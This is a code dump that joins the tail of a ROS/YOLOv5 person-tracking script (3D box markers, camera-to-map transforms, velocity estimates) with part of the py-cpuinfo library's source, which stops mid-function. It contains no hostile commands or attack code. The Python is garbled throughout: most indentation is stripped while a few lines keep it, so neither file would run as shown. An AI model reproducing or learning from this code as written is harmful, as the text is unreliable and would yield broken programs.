            # transform not available yet; bail out as in the empty-box case above
            return 0, 0, None
        pcl = self.listener.transformPointCloud('/map', pcl)
from geometry_msgs.msg import Point
points = [Point(xmin,ymin,zmin),Point(xmax,ymin,zmin),
Point(xmin,ymax,zmin),Point(xmax,ymax,zmin),
Point(xmin,ymin,zmax),Point(xmax,ymin,zmax),
Point(xmin,ymax,zmax),Point(xmax,ymax,zmax)]
        # build the bounding-box marker
marker = Marker()
marker.header.frame_id = 'map'
marker.header.stamp = rospy.Time.now()
marker.action = Marker.ADD
marker.type = Marker.LINE_LIST
# marker.lifetime = rospy.Duration(0)
marker.color.r = 1
marker.color.g = 0
marker.color.b = 0
marker.color.a = 1
marker.scale.x = 0.2
marker.points = []
for line in self.lines:
marker.points.append(points[line[0]])
marker.points.append(points[line[1]])
return cx , cy , marker
# @jit
def publish3dbox(self,depth_img,bbox,identities=None,offset=(0,0)):
markerarray = MarkerArray()
dt = (self.thistime - self.lasttime).to_sec()
idcentvel_tmp = []
        # build the MarkerArray and match against previous ids to compute idcenvel
for i,id_ in enumerate(identities):
marker = Marker()
cx,cy,marker = self.create_box(depth_img,bbox[i],offset)
marker.id = id_
markerarray.markers.append(marker)
flag = 0
            # nice side effect: the list starts out empty, which also takes care of the first-frame time initialisation
for idcv in self.idcenvel:
if id_ == idcv[0]:
vx = (cx - idcv[1])/dt
vy = (cy - idcv[2])/dt
idcentvel_tmp.append([id_,cx,cy,vx,vy])
flag = 1
break
if not flag:
vx=vy=0.0
idcentvel_tmp.append([id_,cx,cy,vx,vy])
self.idcenvel = idcentvel_tmp
print('idcenvel',self.idcenvel)
self.pub.publish(markerarray)
def drawsquare(self,xyxy,depth):
        # back-projection formula: x = (u*depth - cx*depth)/fx, y = (v*depth - cy*depth)/fy
        # first multiply the pixel coordinates (u, v, 1) by depth
x1,y1,x2,y2 = [int(i) for i in xyxy]
w = x2 - x1
h = y2 - y1
        # crop away the background using the golden ratio
import math
u1 = math.ceil(x1+0.382*w)
u2 = math.ceil(x1+0.618*w)
v1 = math.ceil(y1+0.382*h)
v2 = math.ceil(y1+0.618*h)
uvd = []
for u in range(u1,u2):
for v in range(v1,v2):
depth_ = float(depth[v,u])*self.scale
if depth_ > 10: continue
else: uvd.append([u*depth_,v*depth_,depth_])
yzx = self.K.dot(np.array(uvd).T).T
        # use the mean in place of the centroid
cx = yzx[:,2].mean()
cy = yzx[:,0].mean()
        # find the eight corner vertices
xmax = yzx[:,2].max()
xmin = yzx[:,2].min()
ymax = yzx[:,0].max()
ymin = yzx[:,0].min()
zmax = yzx[:,1].max()
zmin = yzx[:,1].min()
# from sensor_msgs.msg import PointCloud
# pcl = PointCloud()
# pcl.header.frame_id = '/camera_frame'
# pcl.header.frame_id = self.thistime
# pcl.points.append((cx,cy,0))
# pcl.points.append((xmax,ymax,zmax))
# pcl.points.append((xmin,ymin,zmin))
# print(pcl)
        # transform points from the camera frame to the global (map) frame
import tf
# try:
(trans,rot) = self.listener.lookupTransform(target_frame='/map',source_frame='/camera_frame',time=rospy.Time(0))
print('transform yes')
# print(type(trans))
# print(rot)
from scipy.spatial.transform import Rotation as R
r = R.from_quat(rot)
rostate_matrix = r.as_matrix()
vector = np.array((cx,cy,0))
print('firstvector=',vector)
        # apply the map<-camera transform: rotate first, then translate
        vector = rostate_matrix.dot(vector) + trans
# cx = pcl.points[0].x
# cy = pcl.points[0].y
# r1 = abs(pcl.points[2].x-pcl.points[1].x)
# r2 = abs(pcl.points[2].y-pcl.points[1].y)
# r = min([r1,r2])
print('trans=',trans)
print('rot=',rostate_matrix)
print('second=',vector)
return vector[0] , vector[1] , (xmax-xmin)/2
def twodbox(self,depth,bbox,identities=None,offset=(0,0)):
dt = (self.thistime - self.lasttime).to_sec()
print('dt=',dt)
idcentvel_tmp = []
for i,id in enumerate(identities):
cx,cy,r = self.drawsquare(bbox[i],depth)
            # nice side effect: the list starts out empty, which also takes care of the first-frame time initialisation
flag = 0
for idcv in self.idcenvel:
if id == idcv[0]:
vx = (cx - idcv[1])/dt
vy = (cy - idcv[2])/dt
if abs(vx) < 0.01: vx=0.0
if abs(vy) < 0.01: vy=0.0
idcentvel_tmp.append((id,cx,cy,vx,vy,0.5))
flag = 1
break
if not flag:
vx = vy = 0.0
idcentvel_tmp.append((id,cx,cy,vx,vy,0.5))
## update idcenvel
self.idcenvel = idcentvel_tmp
print(idcentvel_tmp)
return self.idcenvel
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--weights', type=str,
default='yolov5/weights/yolov5s.pt', help='model.pt path')
# file/folder, 0 for webcam
parser.add_argument('--source', type=str,
default='inference/images', help='source')
parser.add_argument('--output', type=str, default='inference/output',
help='output folder') # output folder
parser.add_argument('--img-size', type=int, default=640,
help='inference size (pixels)')
parser.add_argument('--conf-thres', type=float,
default=0.4, help='object confidence threshold')
parser.add_argument('--iou-thres', type=float,
default=0.5, help='IOU threshold for NMS')
parser.add_argument('--fourcc', type=str, default='mp4v',
help='output video codec (verify ffmpeg support)')
parser.add_argument('--device', default='',
help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
parser.add_argument('--view-img', action='store_true',
help='display results')
parser.add_argument('--save-txt', action='store_true',
help='save results to *.txt')
# class 0 is person
parser.add_argument('--classes', nargs='+', type=int,
default=[0], help='filter by class')
parser.add_argument('--agnostic-nms', action='store_true',
help='class-agnostic NMS')
parser.add_argument('--augment', action='store_true',
help='augmented inference')
parser.add_argument("--config_deepsort", type=str,
default="deep_sort_pytorch/configs/deep_sort.yaml")
args = parser.parse_args()
args.img_size = check_img_size(args.img_size)
print(args)
rospy.init_node('watchout')
watchout = Watchout()
with torch.no_grad():
watchout.watch(args)
|
cpuinfo.py
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Copyright (c) 2014-2021 Matthew Brennan Jones <matthew.brennan.jones@gmail.com>
# Py-cpuinfo gets CPU info with pure Python 2 & 3
# It uses the MIT License
# It is hosted at: https://github.com/workhorsy/py-cpuinfo
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
CPUINFO_VERSION = (8, 0, 0)
CPUINFO_VERSION_STRING = '.'.join([str(n) for n in CPUINFO_VERSION])
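# Typical usage of this module (a sketch; the exact keys present depend on the platform and CPU):
#   >>> import cpuinfo
#   >>> info = cpuinfo.get_cpu_info()
#   >>> info['brand_raw'], info['arch'], info['hz_advertised_friendly']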
import os, sys
import platform
import multiprocessing
import ctypes
IS_PY2 = sys.version_info[0] == 2
CAN_CALL_CPUID_IN_SUBPROCESS = True
g_trace = None
class Trace(object):
def __init__(self, is_active, is_stored_in_string):
self._is_active = is_active
if not self._is_active:
return
from datetime import datetime
if IS_PY2:
from cStringIO import StringIO
else:
from io import StringIO
if is_stored_in_string:
self._output = StringIO()
else:
date = datetime.now().strftime("%Y-%m-%d_%H-%M-%S-%f")
self._output = open('cpuinfo_trace_{0}.trace'.format(date), 'w')
self._stdout = StringIO()
self._stderr = StringIO()
self._err = None
def header(self, msg):
if not self._is_active: return
from inspect import stack
frame = stack()[1]
file = frame[1]
line = frame[2]
self._output.write("{0} ({1} {2})\n".format(msg, file, line))
self._output.flush()
def success(self):
if not self._is_active: return
from inspect import stack
frame = stack()[1]
file = frame[1]
line = frame[2]
self._output.write("Success ... ({0} {1})\n\n".format(file, line))
self._output.flush()
def fail(self, msg):
if not self._is_active: return
from inspect import stack
frame = stack()[1]
file = frame[1]
line = frame[2]
if isinstance(msg, str):
msg = ''.join(['\t' + line for line in msg.split('\n')]) + '\n'
self._output.write(msg)
self._output.write("Failed ... ({0} {1})\n\n".format(file, line))
self._output.flush()
elif isinstance(msg, Exception):
from traceback import format_exc
err_string = format_exc()
self._output.write("\tFailed ... ({0} {1})\n".format(file, line))
self._output.write(''.join(['\t\t{0}\n'.format(n) for n in err_string.split('\n')]) + '\n')
self._output.flush()
def command_header(self, msg):
if not self._is_active: return
from inspect import stack
frame = stack()[3]
file = frame[1]
line = frame[2]
self._output.write("\t{0} ({1} {2})\n".format(msg, file, line))
self._output.flush()
def command_output(self, msg, output):
if not self._is_active: return
self._output.write("\t\t{0}\n".format(msg))
self._output.write(''.join(['\t\t\t{0}\n'.format(n) for n in output.split('\n')]) + '\n')
self._output.flush()
def keys(self, keys, info, new_info):
if not self._is_active: return
from inspect import stack
frame = stack()[2]
file = frame[1]
line = frame[2]
# List updated keys
self._output.write("\tChanged keys ({0} {1})\n".format(file, line))
changed_keys = [key for key in keys if key in info and key in new_info and info[key] != new_info[key]]
if changed_keys:
for key in changed_keys:
self._output.write('\t\t{0}: {1} to {2}\n'.format(key, info[key], new_info[key]))
else:
self._output.write('\t\tNone\n')
# List new keys
self._output.write("\tNew keys ({0} {1})\n".format(file, line))
new_keys = [key for key in keys if key in new_info and key not in info]
if new_keys:
for key in new_keys:
self._output.write('\t\t{0}: {1}\n'.format(key, new_info[key]))
else:
self._output.write('\t\tNone\n')
self._output.write('\n')
self._output.flush()
def write(self, msg):
if not self._is_active: return
self._output.write(msg + '\n')
self._output.flush()
def to_dict(self, info, is_fail):
return {
'output' : self._output.getvalue(),
'stdout' : self._stdout.getvalue(),
'stderr' : self._stderr.getvalue(),
'info' : info,
'err' : self._err,
'is_fail' : is_fail
}
class DataSource(object):
bits = platform.architecture()[0]
cpu_count = multiprocessing.cpu_count()
is_windows = platform.system().lower() == 'windows'
arch_string_raw = platform.machine()
uname_string_raw = platform.uname()[5]
can_cpuid = True
@staticmethod
def has_proc_cpuinfo():
return os.path.exists('/proc/cpuinfo')
@staticmethod
def has_dmesg():
return len(_program_paths('dmesg')) > 0
@staticmethod
def has_var_run_dmesg_boot():
uname = platform.system().strip().strip('"').strip("'").strip().lower()
return 'linux' in uname and os.path.exists('/var/run/dmesg.boot')
@staticmethod
def has_cpufreq_info():
return len(_program_paths('cpufreq-info')) > 0
@staticmethod
def has_sestatus():
return len(_program_paths('sestatus')) > 0
@staticmethod
def has_sysctl():
return len(_program_paths('sysctl')) > 0
@staticmethod
def has_isainfo():
return len(_program_paths('isainfo')) > 0
@staticmethod
def has_kstat():
return len(_program_paths('kstat')) > 0
@staticmethod
def has_sysinfo():
uname = platform.system().strip().strip('"').strip("'").strip().lower()
is_beos = 'beos' in uname or 'haiku' in uname
return is_beos and len(_program_paths('sysinfo')) > 0
@staticmethod
def has_lscpu():
return len(_program_paths('lscpu')) > 0
@staticmethod
def has_ibm_pa_features():
return len(_program_paths('lsprop')) > 0
@staticmethod
def has_wmic():
returncode, output = _run_and_get_stdout(['wmic', 'os', 'get', 'Version'])
return returncode == 0 and len(output) > 0
@staticmethod
def cat_proc_cpuinfo():
return _run_and_get_stdout(['cat', '/proc/cpuinfo'])
@staticmethod
def cpufreq_info():
return _run_and_get_stdout(['cpufreq-info'])
@staticmethod
def sestatus_b():
return _run_and_get_stdout(['sestatus', '-b'])
@staticmethod
def dmesg_a():
return _run_and_get_stdout(['dmesg', '-a'])
@staticmethod
def cat_var_run_dmesg_boot():
return _run_and_get_stdout(['cat', '/var/run/dmesg.boot'])
@staticmethod
def sysctl_machdep_cpu_hw_cpufrequency():
return _run_and_get_stdout(['sysctl', 'machdep.cpu', 'hw.cpufrequency'])
@staticmethod
def isainfo_vb():
return _run_and_get_stdout(['isainfo', '-vb'])
@staticmethod
def kstat_m_cpu_info():
return _run_and_get_stdout(['kstat', '-m', 'cpu_info'])
@staticmethod
def sysinfo_cpu():
return _run_and_get_stdout(['sysinfo', '-cpu'])
@staticmethod
def lscpu():
return _run_and_get_stdout(['lscpu'])
@staticmethod
def ibm_pa_features():
import glob
ibm_features = glob.glob('/proc/device-tree/cpus/*/ibm,pa-features')
if ibm_features:
return _run_and_get_stdout(['lsprop', ibm_features[0]])
@staticmethod
def wmic_cpu():
return _run_and_get_stdout(['wmic', 'cpu', 'get', 'Name,CurrentClockSpeed,L2CacheSize,L3CacheSize,Description,Caption,Manufacturer', '/format:list'])
@staticmethod
def winreg_processor_brand():
processor_brand = _read_windows_registry_key(r"Hardware\Description\System\CentralProcessor\0", "ProcessorNameString")
return processor_brand.strip()
@staticmethod
def winreg_vendor_id_raw():
vendor_id_raw = _read_windows_registry_key(r"Hardware\Description\System\CentralProcessor\0", "VendorIdentifier")
return vendor_id_raw
@staticmethod
def winreg_arch_string_raw():
arch_string_raw = _read_windows_registry_key(r"SYSTEM\CurrentControlSet\Control\Session Manager\Environment", "PROCESSOR_ARCHITECTURE")
return arch_string_raw
@staticmethod
def winreg_hz_actual():
hz_actual = _read_windows_registry_key(r"Hardware\Description\System\CentralProcessor\0", "~Mhz")
hz_actual = _to_decimal_string(hz_actual)
return hz_actual
@staticmethod
def winreg_feature_bits():
feature_bits = _read_windows_registry_key(r"Hardware\Description\System\CentralProcessor\0", "FeatureSet")
return feature_bits
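# Search every directory on PATH for an executable named program_name. If the
# PATHEXT environment variable is set (as it is on Windows), each listed
# extension is tried as well. Returns a list of all matching paths.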
def _program_paths(program_name):
paths = []
	# Materialise PATHEXT as a list so it can be re-checked for every PATH entry
	# (a filter() iterator would be exhausted after the first directory on Python 3)
	exts = [e for e in os.environ.get('PATHEXT', '').split(os.pathsep) if e]
	path = os.environ['PATH']
	for p in os.environ['PATH'].split(os.pathsep):
p = os.path.join(p, program_name)
if os.access(p, os.X_OK):
paths.append(p)
for e in exts:
pext = p + e
if os.access(pext, os.X_OK):
paths.append(pext)
return paths
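# Run a command and return (return code, stdout) with stdout decoded to text.
# If pipe_command is given, the first command's output is piped into it, the
# shell equivalent of "command | pipe_command", and the second command's
# return code and stdout are returned.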
def _run_and_get_stdout(command, pipe_command=None):
from subprocess import Popen, PIPE
p1, p2, stdout_output, stderr_output = None, None, None, None
g_trace.command_header('Running command "' + ' '.join(command) + '" ...')
# Run the command normally
if not pipe_command:
p1 = Popen(command, stdout=PIPE, stderr=PIPE, stdin=PIPE)
# Run the command and pipe it into another command
else:
p2 = Popen(command, stdout=PIPE, stderr=PIPE, stdin=PIPE)
p1 = Popen(pipe_command, stdin=p2.stdout, stdout=PIPE, stderr=PIPE)
p2.stdout.close()
# Get the stdout and stderr
stdout_output, stderr_output = p1.communicate()
if not IS_PY2:
stdout_output = stdout_output.decode(encoding='UTF-8')
stderr_output = stderr_output.decode(encoding='UTF-8')
# Send the result to the logger
g_trace.command_output('return code:', str(p1.returncode))
g_trace.command_output('stdout:', stdout_output)
# Return the return code and stdout
return p1.returncode, stdout_output
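# Read a single value from the Windows Registry under HKEY_LOCAL_MACHINE,
# using _winreg on Python 2 and winreg on Python 3.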
def _read_windows_registry_key(key_name, field_name):
g_trace.command_header('Reading Registry key "{0}" field "{1}" ...'.format(key_name, field_name))
try:
import _winreg as winreg
except ImportError as err:
try:
import winreg
except ImportError as err:
pass
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key_name)
value = winreg.QueryValueEx(key, field_name)[0]
winreg.CloseKey(key)
g_trace.command_output('value:', str(value))
return value
# Make sure we are running on a supported system
def _check_arch():
arch, bits = _parse_arch(DataSource.arch_string_raw)
if not arch in ['X86_32', 'X86_64', 'ARM_7', 'ARM_8',
'PPC_64', 'S390X', 'MIPS_32', 'MIPS_64',
'RISCV_32', 'RISCV_64', 'LOONG_32', 'LOONG_64']:
raise Exception("py-cpuinfo currently only works on X86 "
"and some ARM/PPC/S390X/MIPS/RISCV/LOONG CPUs.")
def _obj_to_b64(thing):
import pickle
import base64
a = thing
b = pickle.dumps(a)
c = base64.b64encode(b)
d = c.decode('utf8')
return d
def _b64_to_obj(thing):
import pickle
import base64
try:
a = base64.b64decode(thing)
b = pickle.loads(a)
return b
except:
return {}
def _utf_to_str(input):
if IS_PY2 and isinstance(input, unicode):
return input.encode('utf-8')
elif isinstance(input, list):
return [_utf_to_str(element) for element in input]
elif isinstance(input, dict):
return {_utf_to_str(key): _utf_to_str(value)
for key, value in input.items()}
else:
return input
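# Merge new_info into info: a key is copied only when info has no value for it
# yet, except 'flags', which becomes the sorted union of both flag lists.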
def _copy_new_fields(info, new_info):
keys = [
'vendor_id_raw', 'hardware_raw', 'brand_raw', 'hz_advertised_friendly', 'hz_actual_friendly',
'hz_advertised', 'hz_actual', 'arch', 'bits', 'count',
'arch_string_raw', 'uname_string_raw',
'l2_cache_size', 'l2_cache_line_size', 'l2_cache_associativity',
'stepping', 'model', 'family',
'processor_type', 'flags',
'l3_cache_size', 'l1_data_cache_size', 'l1_instruction_cache_size'
]
g_trace.keys(keys, info, new_info)
# Update the keys with new values
for key in keys:
if new_info.get(key, None) and not info.get(key, None):
info[key] = new_info[key]
elif key == 'flags' and new_info.get('flags'):
for f in new_info['flags']:
if f not in info['flags']: info['flags'].append(f)
info['flags'].sort()
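# Scan raw_string for "name : value" lines and return the value of the first
# field whose name matches one of field_names. When cant_be_number is True,
# purely numeric values are skipped (for example so a brand lookup does not
# match the numeric "processor : 0" index lines in /proc/cpuinfo).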
def _get_field_actual(cant_be_number, raw_string, field_names):
for line in raw_string.splitlines():
for field_name in field_names:
field_name = field_name.lower()
if ':' in line:
left, right = line.split(':', 1)
left = left.strip().lower()
right = right.strip()
if left == field_name and len(right) > 0:
if cant_be_number:
if not right.isdigit():
return right
else:
return right
return None
def _get_field(cant_be_number, raw_string, convert_to, default_value, *field_names):
retval = _get_field_actual(cant_be_number, raw_string, field_names)
# Convert the return value
if retval and convert_to:
try:
retval = convert_to(retval)
except:
retval = default_value
# Return the default if there is no return value
if retval is None:
retval = default_value
return retval
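# Normalise a frequency value into a decimal string with a single dot,
# e.g. 1800 -> '1800.0' and '2.80 GHz' -> '2.8'. A ',' decimal separator is
# converted to '.', and '0.0' is returned for anything unparsable.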
def _to_decimal_string(ticks):
try:
# Convert to string
ticks = '{0}'.format(ticks)
# Sometimes ',' is used as a decimal separator
ticks = ticks.replace(',', '.')
# Strip off non numbers and decimal places
ticks = "".join(n for n in ticks if n.isdigit() or n=='.').strip()
if ticks == '':
ticks = '0'
# Add decimal if missing
if '.' not in ticks:
ticks = '{0}.0'.format(ticks)
# Remove trailing zeros
ticks = ticks.rstrip('0')
# Add one trailing zero for empty right side
if ticks.endswith('.'):
ticks = '{0}0'.format(ticks)
# Make sure the number can be converted to a float
ticks = float(ticks)
ticks = '{0}'.format(ticks)
return ticks
except:
return '0.0'
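# Convert a decimal-string frequency plus a power-of-ten scale into a full Hz
# value expressed as a (whole Hz, remainder) integer pair,
# e.g. ('2.8', 9) -> (2800000000, 0).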
def _hz_short_to_full(ticks, scale):
try:
# Make sure the number can be converted to a float
ticks = float(ticks)
ticks = '{0}'.format(ticks)
# Scale the numbers
hz = ticks.lstrip('0')
old_index = hz.index('.')
hz = hz.replace('.', '')
hz = hz.ljust(scale + old_index+1, '0')
new_index = old_index + scale
hz = '{0}.{1}'.format(hz[:new_index], hz[new_index:])
left, right = hz.split('.')
left, right = int(left), int(right)
return (left, right)
except:
return (0, 0)
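# Parse a human readable frequency such as '2.80 GHz' into the same
# (whole Hz, remainder) integer pair as _hz_short_to_full.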
def _hz_friendly_to_full(hz_string):
try:
hz_string = hz_string.strip().lower()
hz, scale = (None, None)
if hz_string.endswith('ghz'):
scale = 9
elif hz_string.endswith('mhz'):
scale = 6
elif hz_string.endswith('hz'):
scale = 0
hz = "".join(n for n in hz_string if n.isdigit() or n=='.').strip()
if not '.' in hz:
hz += '.0'
hz, scale = _hz_short_to_full(hz, scale)
return (hz, scale)
except:
return (0, 0)
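# Format a decimal-string frequency and scale as a human readable string,
# e.g. ('2.8', 9) -> '2.8000 GHz'.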
def _hz_short_to_friendly(ticks, scale):
try:
# Get the raw Hz as a string
left, right = _hz_short_to_full(ticks, scale)
result = '{0}.{1}'.format(left, right)
# Get the location of the dot, and remove said dot
dot_index = result.index('.')
result = result.replace('.', '')
# Get the Hz symbol and scale
symbol = "Hz"
scale = 0
if dot_index > 9:
symbol = "GHz"
scale = 9
elif dot_index > 6:
symbol = "MHz"
scale = 6
elif dot_index > 3:
symbol = "KHz"
scale = 3
# Get the Hz with the dot at the new scaled point
result = '{0}.{1}'.format(result[:-scale-1], result[-scale-1:])
# Format the ticks to have 4 numbers after the decimal
# and remove any superfluous zeroes.
result = '{0:.4f} {1}'.format(float(result), symbol)
result = result.rstrip('0')
return result
except:
return '0.0000 Hz'
def _to_friendly_bytes(input):
import re
if not input:
return input
input = "{0}".format(input)
formats = {
r"^[0-9]+B$" : 'B',
r"^[0-9]+K$" : 'KB',
r"^[0-9]+M$" : 'MB',
r"^[0-9]+G$" : 'GB'
}
for pattern, friendly_size in formats.items():
if re.match(pattern, input):
return "{0} {1}".format(input[ : -1].strip(), friendly_size)
return input
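# Convert a human readable size such as '512 KB' or '4 MiB' into bytes,
# e.g. '512 KB' -> 524288. The input is returned unchanged if no known
# suffix matches or parsing fails.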
def _friendly_bytes_to_int(friendly_bytes):
input = friendly_bytes.lower()
formats = [
{'gib' : 1024 * 1024 * 1024},
{'mib' : 1024 * 1024},
{'kib' : 1024},
{'gb' : 1024 * 1024 * 1024},
{'mb' : 1024 * 1024},
{'kb' : 1024},
{'g' : 1024 * 1024 * 1024},
{'m' : 1024 * 1024},
{'k' : 1024},
{'b' : 1},
]
try:
for entry in formats:
pattern = list(entry.keys())[0]
multiplier = list(entry.values())[0]
if input.endswith(pattern):
return int(input.split(pattern)[0].strip()) * multiplier
except Exception as err:
pass
return friendly_bytes
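# Extract the advertised frequency from a CPU brand string such as
# "Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz", returning a decimal string and a
# power-of-ten scale, e.g. ('3.4', 9). Returns ('0.0', 0) if no Hz is present.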
def _parse_cpu_brand_string(cpu_string):
# Just return 0 if the processor brand does not have the Hz
if not 'hz' in cpu_string.lower():
return ('0.0', 0)
hz = cpu_string.lower()
scale = 0
if hz.endswith('mhz'):
scale = 6
elif hz.endswith('ghz'):
scale = 9
if '@' in hz:
hz = hz.split('@')[1]
else:
hz = hz.rsplit(None, 1)[1]
hz = hz.rstrip('mhz').rstrip('ghz').strip()
hz = _to_decimal_string(hz)
return (hz, scale)
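# Parse a dmesg style CPU brand line where fields such as Origin, stepping,
# model and family appear in parentheses after the brand string. Returns a
# (hz, scale, brand, vendor_id, stepping, model, family) tuple.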
def _parse_cpu_brand_string_dx(cpu_string):
import re
# Find all the strings inside brackets ()
starts = [m.start() for m in re.finditer(r"\(", cpu_string)]
ends = [m.start() for m in re.finditer(r"\)", cpu_string)]
insides = {k: v for k, v in zip(starts, ends)}
insides = [cpu_string[start+1 : end] for start, end in insides.items()]
# Find all the fields
vendor_id, stepping, model, family = (None, None, None, None)
for inside in insides:
for pair in inside.split(','):
pair = [n.strip() for n in pair.split(':')]
if len(pair) > 1:
name, value = pair[0], pair[1]
if name == 'origin':
vendor_id = value.strip('"')
elif name == 'stepping':
stepping = int(value.lstrip('0x'), 16)
elif name == 'model':
model = int(value.lstrip('0x'), 16)
elif name in ['fam', 'family']:
family = int(value.lstrip('0x'), 16)
# Find the Processor Brand
# Strip off extra strings in brackets at end
brand = cpu_string.strip()
is_working = True
while is_working:
is_working = False
for inside in insides:
full = "({0})".format(inside)
if brand.endswith(full):
brand = brand[ :-len(full)].strip()
is_working = True
# Find the Hz in the brand string
hz_brand, scale = _parse_cpu_brand_string(brand)
# Find Hz inside brackets () after the brand string
if hz_brand == '0.0':
for inside in insides:
hz = inside
for entry in ['GHz', 'MHz', 'Hz']:
if entry in hz:
hz = "CPU @ " + hz[ : hz.find(entry) + len(entry)]
hz_brand, scale = _parse_cpu_brand_string(hz)
break
return (hz_brand, scale, brand, vendor_id, stepping, model, family)
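# Pull CPU details out of a raw dmesg log: the "CPU:"/"CPU0:" brand lines,
# the "Origin=" line and any "Features=" lines. Returns {} when nothing
# useful can be parsed.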
def _parse_dmesg_output(output):
try:
# Get all the dmesg lines that might contain a CPU string
lines = output.split(' CPU0:')[1:] + \
output.split(' CPU1:')[1:] + \
output.split(' CPU:')[1:] + \
output.split('\nCPU0:')[1:] + \
output.split('\nCPU1:')[1:] + \
output.split('\nCPU:')[1:]
lines = [l.split('\n')[0].strip() for l in lines]
# Convert the lines to CPU strings
cpu_strings = [_parse_cpu_brand_string_dx(l) for l in lines]
# Find the CPU string that has the most fields
best_string = None
highest_count = 0
for cpu_string in cpu_strings:
count = sum([n is not None for n in cpu_string])
if count > highest_count:
highest_count = count
best_string = cpu_string
# If no CPU string was found, return {}
if not best_string:
return {}
hz_actual, scale, processor_brand, vendor_id, stepping, model, family = best_string
# Origin
if ' Origin=' in output:
fields = output[output.find(' Origin=') : ].split('\n')[0]
fields = fields.strip().split()
fields = [n.strip().split('=') for n in fields]
fields = [{n[0].strip().lower() : n[1].strip()} for n in fields]
for field in fields:
name = list(field.keys())[0]
value = list(field.values())[0]
if name == 'origin':
vendor_id = value.strip('"')
elif name == 'stepping':
stepping = int(value.lstrip('0x'), 16)
elif name == 'model':
model = int(value.lstrip('0x'), 16)
elif name in ['fam', 'family']:
family = int(value.lstrip('0x'), 16)
# Features
flag_lines = []
for category in [' Features=', ' Features2=', ' AMD Features=', ' AMD Features2=']:
if category in output:
flag_lines.append(output.split(category)[1].split('\n')[0])
flags = []
for line in flag_lines:
line = line.split('<')[1].split('>')[0].lower()
for flag in line.split(','):
flags.append(flag)
flags.sort()
# Convert from GHz/MHz string to Hz
hz_advertised, scale = _parse_cpu_brand_string(processor_brand)
# If advertised hz not found, use the actual hz
if hz_advertised == '0.0':
scale = 6
hz_advertised = _to_decimal_string(hz_actual)
info = {
'vendor_id_raw' : vendor_id,
'brand_raw' : processor_brand,
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
if hz_advertised and hz_advertised != '0.0':
info['hz_advertised_friendly'] = _hz_short_to_friendly(hz_advertised, scale)
info['hz_actual_friendly'] = _hz_short_to_friendly(hz_actual, scale)
if hz_advertised and hz_advertised != '0.0':
info['hz_advertised'] = _hz_short_to_full(hz_advertised, scale)
info['hz_actual'] = _hz_short_to_full(hz_actual, scale)
return {k: v for k, v in info.items() if v}
except Exception as err:
g_trace.fail(err)
#raise
pass
return {}
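# Map a raw machine/architecture string (e.g. 'x86_64', 'aarch64', 'ppc64le')
# onto one of the canonical arch names used here, along with its bit width.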
def _parse_arch(arch_string_raw):
import re
arch, bits = None, None
arch_string_raw = arch_string_raw.lower()
# X86
if re.match(r'^i\d86$|^x86$|^x86_32$|^i86pc$|^ia32$|^ia-32$|^bepc$', arch_string_raw):
arch = 'X86_32'
bits = 32
elif re.match(r'^x64$|^x86_64$|^x86_64t$|^i686-64$|^amd64$|^ia64$|^ia-64$', arch_string_raw):
arch = 'X86_64'
bits = 64
# ARM
elif re.match(r'^armv8-a|aarch64|arm64$', arch_string_raw):
arch = 'ARM_8'
bits = 64
elif re.match(r'^armv7$|^armv7[a-z]$|^armv7-[a-z]$|^armv6[a-z]$', arch_string_raw):
arch = 'ARM_7'
bits = 32
elif re.match(r'^armv8$|^armv8[a-z]$|^armv8-[a-z]$', arch_string_raw):
arch = 'ARM_8'
bits = 32
# PPC
elif re.match(r'^ppc32$|^prep$|^pmac$|^powermac$', arch_string_raw):
arch = 'PPC_32'
bits = 32
elif re.match(r'^powerpc$|^ppc64$|^ppc64le$', arch_string_raw):
arch = 'PPC_64'
bits = 64
# SPARC
elif re.match(r'^sparc32$|^sparc$', arch_string_raw):
arch = 'SPARC_32'
bits = 32
elif re.match(r'^sparc64$|^sun4u$|^sun4v$', arch_string_raw):
arch = 'SPARC_64'
bits = 64
# S390X
elif re.match(r'^s390x$', arch_string_raw):
arch = 'S390X'
bits = 64
# MIPS
elif re.match('^mips$', arch_string_raw):
arch = 'MIPS_32'
bits = 32
elif re.match('^mips64$', arch_string_raw):
arch = 'MIPS_64'
bits = 64
# RISCV
elif re.match(r'^riscv$|^riscv32$|^riscv32be$', arch_string_raw):
arch = 'RISCV_32'
bits = 32
elif re.match(r'^riscv64$|^riscv64be$', arch_string_raw):
arch = 'RISCV_64'
bits = 64
# LOONG
elif re.match('^loongarch32$', arch_string_raw):
arch = 'LOONG_32'
bits = 32
elif re.match('^loongarch64$', arch_string_raw):
arch = 'LOONG_64'
bits = 64
return (arch, bits)
def _is_bit_set(reg, bit):
mask = 1 << bit
is_set = reg & mask > 0
return is_set
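# Running CPUID requires memory that is writable and then executable, which
# SELinux in enforcing mode may forbid, so that case is detected up front via
# sestatus and its allow_execheap / allow_execmem booleans.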
def _is_selinux_enforcing(trace):
# Just return if the SE Linux Status Tool is not installed
if not DataSource.has_sestatus():
trace.fail('Failed to find sestatus.')
return False
# Run the sestatus, and just return if it failed to run
returncode, output = DataSource.sestatus_b()
if returncode != 0:
trace.fail('Failed to run sestatus. Skipping ...')
return False
# Figure out if explicitly in enforcing mode
for line in output.splitlines():
line = line.strip().lower()
if line.startswith("current mode:"):
if line.endswith("enforcing"):
return True
else:
return False
# Figure out if we can execute heap and execute memory
can_selinux_exec_heap = False
